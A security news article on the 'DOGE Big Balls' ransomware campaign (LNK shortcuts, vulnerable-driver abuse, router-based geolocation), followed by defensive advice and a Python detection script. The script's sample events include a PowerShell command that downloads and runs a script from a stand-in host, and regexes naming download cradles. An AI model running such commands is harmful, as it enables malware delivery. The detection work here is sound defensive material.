Cyber Security News

DOGE ‘Big Balls’ Ransomware Utilizes ZIP-Based LNK Shortcuts and BYOVD Techniques for Stealthy Attacks

A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.

This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.

Infection Chain: ZIP Files and LNK Shortcuts

The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.

When the victim opens this shortcut, it silently executes a series of PowerShell commands.

These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.

If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”

It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.

For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.

The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.

They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.

BYOVD: Exploiting Vulnerable Drivers

A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.

The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.

This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.

The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.

Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.

Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.

This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.

Ransomware Execution and Psychological Manipulation

Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.

The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.

The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.

After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.

The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.

Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.

To defend against such advanced threats, organizations should:

  • Block execution of untrusted LNK files and PowerShell scripts.
  • Monitor PowerShell activity and process chains for anomalies.
  • Deploy Endpoint Detection and Response (EDR) solutions.
  • Limit administrative privileges and monitor for privilege escalation.
  • Restrict outbound traffic to unauthorized cloud services and monitor for suspicious API calls.
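As an added illustration of the PowerShell and process-chain monitoring recommended above (example code written for this page, not the article's own or any vendor's), the Python below runs three simple detection rules over constructed process-creation events modelled on the chain described earlier: shortcut-launched PowerShell carrying hidden-window/bypass flags or a download cradle, a binary launched from a Startup folder, and a PowerShell-spawned executable in a Temp directory. Every path, PID, hostname and command line is a constructed sample, and the regexes are assumptions about what such telemetry looks like, not the campaign's real indicators.

```python
import re

# Process-creation events in Sysmon Event ID 1 style; all values are constructed samples.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\explorer.exe",   # LNK files are launched by explorer.exe
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass '
                '-Command "iwr http://stage.invalid/s.ps1 | iex"'},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\.hidden\Adobe Acrobat.exe",
     "cmdline": '"Adobe Acrobat.exe"'},
    {"pid": 4201, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\ktool.exe",
     "cmdline": "ktool.exe 4188 <constructed-key>"},
    {"pid": 5000, "parent_image": r"C:\Windows\explorer.exe",   # benign control event
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n report.docx'},
]

POWERSHELL = re.compile(r"\\powershell(_ise)?\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
# Per-user and all-users Startup folders both end in "Start Menu\Programs\Startup".
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Start ?Up\\", re.I)
TEMP_EXE = re.compile(r"\\Temp\\[^\\]+\.exe$", re.I)
CRADLE_OR_OBFUSCATION = re.compile(r"(iwr|invoke-webrequest|downloadstring|iex|invoke-expression|-enc)", re.I)
HIDDEN_OR_BYPASS = re.compile(r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?\s+bypass)", re.I)


def classify(ev):
    """Return the list of rule names an event trips (empty list when it looks benign)."""
    findings = []
    if EXPLORER.search(ev["parent_image"]) and POWERSHELL.search(ev["image"]) and (
            CRADLE_OR_OBFUSCATION.search(ev["cmdline"]) or HIDDEN_OR_BYPASS.search(ev["cmdline"])):
        findings.append("shortcut-launched PowerShell with download cradle or hidden/bypass flags")
    if STARTUP_DIR.search(ev["image"]):
        findings.append("executable launched from a Startup folder")
    if POWERSHELL.search(ev["parent_image"]) and TEMP_EXE.search(ev["image"]):
        findings.append("PowerShell spawned a binary from a Temp directory")
    return findings


def scan(events):
    """Map pid -> findings for every event that trips at least one rule."""
    return {ev["pid"]: f for ev in events if (f := classify(ev))}


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(findings))
```

In production the same rules would be fed from Sysmon or EDR process telemetry rather than an inline list; the Startup-folder rule is worth pairing with a file-write rule, since the drop happens before the launch.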

The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.

Robust, layered security measures are essential to defend against such multi-faceted attacks.


Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She covers various cyber security incidents happening in cyberspace.
